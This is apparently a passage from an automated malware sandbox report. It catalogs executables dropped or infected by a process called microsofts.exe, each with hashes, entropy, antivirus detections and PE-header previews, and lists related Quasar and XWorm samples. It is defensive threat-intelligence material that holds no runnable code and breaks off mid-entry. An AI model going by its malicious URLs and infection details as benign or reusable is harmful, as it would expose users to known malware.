                                                                                                                                                                                                                                                                                                          5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                                                                                                          Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                                                                                                          https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                                                                                                          https://unscsupply.goshopgaming.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                                                                                                          https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                                                                                                          p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                                                                          • 104.26.12.205

                                                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1353216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324373911781983
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:KC4VQjGARQNhiuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:KOCAR0iusqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:0BA21AFD285C8A61389C298D0B32D0A1
                                                                                                                                                                                                                                                                                                          SHA1:0AEA9F8C7EA2BEACCA80D536C17F877FDB8124DE
                                                                                                                                                                                                                                                                                                          SHA-256:C8493E9A0AA0CBC825949549DE06C8E9141DC5A6B69975A333DB2B1FE5989DB1
                                                                                                                                                                                                                                                                                                          SHA-512:EC23535125BC4E0CE2900D6B74880EF8210982DCEC14499FA89021AF453E3BBD1B8A7A0C8DCCE07B8AF95E2FDA7C2549E23EC45C0248CBBC6F89291B76D1F39D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1294848
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.28267990443834
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:DNUpaKghRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DCMKgnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:1E484E750C3622EFE2B346E565427D83
                                                                                                                                                                                                                                                                                                          SHA1:80DA86219F504006D64F284AA38BFAF9CD35F803
                                                                                                                                                                                                                                                                                                          SHA-256:3AFCDD37BDE82918C7C4AB331D3EE9AA4AE94D246360FAF7617963EA2CC1C245
                                                                                                                                                                                                                                                                                                          SHA-512:5D019601113599A112857A46F70639F2298BF5A030336E60788FE8899793D6983AD5BFA4676648B2AA3B38405583A449ACAD9D21368C1650CFCB2A47CD324C68
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....HK......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1314304
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.274116975440763
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:9MEhwdbT6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7KdH6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:F1642246A278D7DF16D8DE5255814A12
                                                                                                                                                                                                                                                                                                          SHA1:B7BE70B7D19F577F966E6E92B69F3B40E7784E13
                                                                                                                                                                                                                                                                                                          SHA-256:E7C9EC2E249583B572CDDEB82368D8A1013278851F7EED7898ADB899135AE436
                                                                                                                                                                                                                                                                                                          SHA-512:1414217710C843F865C969C38DCE86C3AFCE683CD3260D3426791681782B93F077EE3D6DA1A64800F4EACC5E83A71588CB2112B19E8F0FFF80399A6CCAF2A9E9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2203136
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.647019307319807
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:cK0eqkSR7Xgo4TiRPnLWvJGDmg27RnWGj:cK0pR7Xn4TiRCvJGD527BWG
                                                                                                                                                                                                                                                                                                          MD5:3048AD7EB40261BB66748730A168BCD7
                                                                                                                                                                                                                                                                                                          SHA1:FA5C48BB9FF6D5ED247D44137339E5EC15A9BAC1
                                                                                                                                                                                                                                                                                                          SHA-256:98FE4DFC64F8FE0B8EC93A29A55828D7A665810F4F54820281315B1733337F83
                                                                                                                                                                                                                                                                                                          SHA-512:5707DF40509348FEEBEC133E29D526FE9BCFF223851D2CF978485CB96204C100A9367A5DC21C6E6AD10A25905B273BD94258C48083916D4CC9445D248ED40228
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....8S"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2369024
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.5650404779456
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:+fYP1JsEDkSR7Xgo4TiRPnLWvJGDmg27RnWGj:+YPBR7Xn4TiRCvJGD527BWG
                                                                                                                                                                                                                                                                                                          MD5:0788E9FD7B50A4409CD916805AF6E87B
                                                                                                                                                                                                                                                                                                          SHA1:FD51CCE06C46175ECD3F73692FA7664E2EEA16EC
                                                                                                                                                                                                                                                                                                          SHA-256:52F976092999D9B68EC8D75D4BA06745546F216EDB590C9AB278B51823D80303
                                                                                                                                                                                                                                                                                                          SHA-512:B455C16994257F6726B75B294087B93A23706657348872D0613D284283A20524FEA1DFF4A81D1229C79A1FD5E4D9BCAFC8C695E9BF40BD301B8F52CB6B387712
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1245184
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.123550763702093
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:l62SYUcknncXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:SYUckncsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:890AAEA33D7FC03FA431773CB3C093D7
                                                                                                                                                                                                                                                                                                          SHA1:EA9FB1DDD4D2F8F2658C4FD9A6897BB56BACEF75
                                                                                                                                                                                                                                                                                                          SHA-256:29DFADCDC999A66D20F31F516D09EC52368A49F8894B9E6EE7084DA221362E54
                                                                                                                                                                                                                                                                                                          SHA-512:6EB513B52BB877303553AB9138CB2F07DD5DFC9DC71BFD8BBFA35EA0F3223772B38AF4A31543D206A8AC306D8A57D884BB151EF54641F8ECD5BC4E0DC005529D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@..............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1640448
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.166642966269705
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:h+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS6Dmg27RnWGj:LSktbpID527BWG
                                                                                                                                                                                                                                                                                                          MD5:EC3749A9B42B7FBACA94D58BF80B394A
                                                                                                                                                                                                                                                                                                          SHA1:69F7AF695512D94CC5169E4CD23B6F61BD36CDAD
                                                                                                                                                                                                                                                                                                          SHA-256:5010189C827464F58BF5C48B4B24B4CCC70C6C56669B77DB5FDE7FE5368598A8
                                                                                                                                                                                                                                                                                                          SHA-512:4159D37351415AF41829D2199E76536015F7CFC04BA4A13EA588E8F42AB681CB3CF78332352BA767BD9B968114F5D11DD1E32224D9949C93E770F44945FC3C67
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................P..... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2953728
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.094616078157681
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:qGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL9Dmg27RnWGj:24OEtwiICvYMRfdD527BWG
                                                                                                                                                                                                                                                                                                          MD5:F8E477BBCD29C09EF869459B50E47EF0
                                                                                                                                                                                                                                                                                                          SHA1:5D53B8AA442D170663B2F730839AA640772F9F9B
                                                                                                                                                                                                                                                                                                          SHA-256:DBEA4E3C5837220326A4735F6F4A57ACCF2D072C83868F3CA687EBBDF7C47B0E
                                                                                                                                                                                                                                                                                                          SHA-512:234F7796FD9679C5A33329EB7AE61B93F6F21A3369DA04F3690CB992C96AB1EB0300E2F2608BB19889E7E0C613F7CE4AF5D37967B964F8740CD7654F1F765409
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1485824
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.496381029949622
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fAMuR+3kMbVjh+sqjnhMgeiCl7G0nehbGZpbD:ID+lbVjhSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:0BDE3DA2E7745E8945865ADA4532AEB6
                                                                                                                                                                                                                                                                                                          SHA1:8F6E3C546FFC329902479BB83EC6F6F31BE6D48E
                                                                                                                                                                                                                                                                                                          SHA-256:30335529149140D172C9597809C7D64034550D7DA8C7574D25E45B06D861EB50
                                                                                                                                                                                                                                                                                                          SHA-512:D6FE71406DF9ADC5606EDCF3426AB98519981D6E9098A2761E3C3B57E85B639180EB9A765D301563340673488D215CD4B8CB2730A91A0FC568E035AF24573B18
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1290240
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.277755257777859
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:mImGUcsvZZdubv7hfl3hXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:4D4DF10337248271E6C2C8AEA816774A
                                                                                                                                                                                                                                                                                                          SHA1:A819A529406A5BE1668788DADBF36A10AE96AEE5
                                                                                                                                                                                                                                                                                                          SHA-256:7E67D35C90429228B069506253D5F40492AC6BBAD4511CD81D409026F21B3008
                                                                                                                                                                                                                                                                                                          SHA-512:20CB44F764F770572BFE729D2B1505C580B2B23A07472C50D282C727C15877AD7972DF4D23BF1CADCE6C39B42E6B14F14C1A3E283CE2799362F2EA313696B808
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1644544
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.694789979832765
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:P0vHyeLj8trn3wsMsqjnhMgeiCl7G0nehbGZpbD:Ktj4rgs4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:C4C9AA7DDCAEEF2C0C6920F8F5612FE3
                                                                                                                                                                                                                                                                                                          SHA1:DDE6317067C2EE2D48C66163BFA1A39BA1976B05
                                                                                                                                                                                                                                                                                                          SHA-256:7A396D0028EB8430564EE61A3E0124D93649957D985DB22CCBB4471069E6D67F
                                                                                                                                                                                                                                                                                                          SHA-512:3DFE73D118181403A85A36F4AA62D59CB402DD9A698DB2DA23E780AD856EF72E4F9ED3D0065B27870C629F92437D9FED13B27AC8A35A41C083A1BA8FFB71A75A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1781760
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.279671066391976
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:zoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZpsqjnhMgeiCl7G0nehbGZpv:64i0wGJra0uAUfkVy7/ZtDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:9AEBB2C016C62B639B0916FC5DCB2DFA
                                                                                                                                                                                                                                                                                                          SHA1:33A6F161D261A812696348319C86C0BD22654A4A
                                                                                                                                                                                                                                                                                                          SHA-256:EC1A2C9B01DE3848CC16C796796F7F6DFDA5209A6DE28985616E2FC7D4C38598
                                                                                                                                                                                                                                                                                                          SHA-512:29E29202827A726729A03E093618E378397647344FA6C3C1002599E3176896CFEDC0B3FF5BC8CE4E13B7B2254B40164E87318FD2A622139AE44DA246FB6808E3
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................7...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1318400
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.448757802040289
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:weR0gB6axoCf0R6RLQRF/TzJqe58BimmsqjnhMgeiCl7G0nehbGZpbD:8gHxmR6uBTzge5MimqDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:DE9C03CEA2B81E07D6E7A838DE73F05B
                                                                                                                                                                                                                                                                                                          SHA1:E48D334FD0ECF1EF4A19E0B1E1DC6018B23AACE9
                                                                                                                                                                                                                                                                                                          SHA-256:23831CC1970439FCA89444E441036933A1E9D0C82207F0D8981280980D124A3A
                                                                                                                                                                                                                                                                                                          SHA-512:54CEDF9BCBA3BF50C9BA0AA68DF82BE55A191470E3365E732DD396B5D03B399DCDA13C88A80E08C00F6BCB66C50A862CCE0499B130465CF7AC3A2CE330138374
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446057768420068
                                                                                                                                                                                                                                                                                                          Encrypted:false
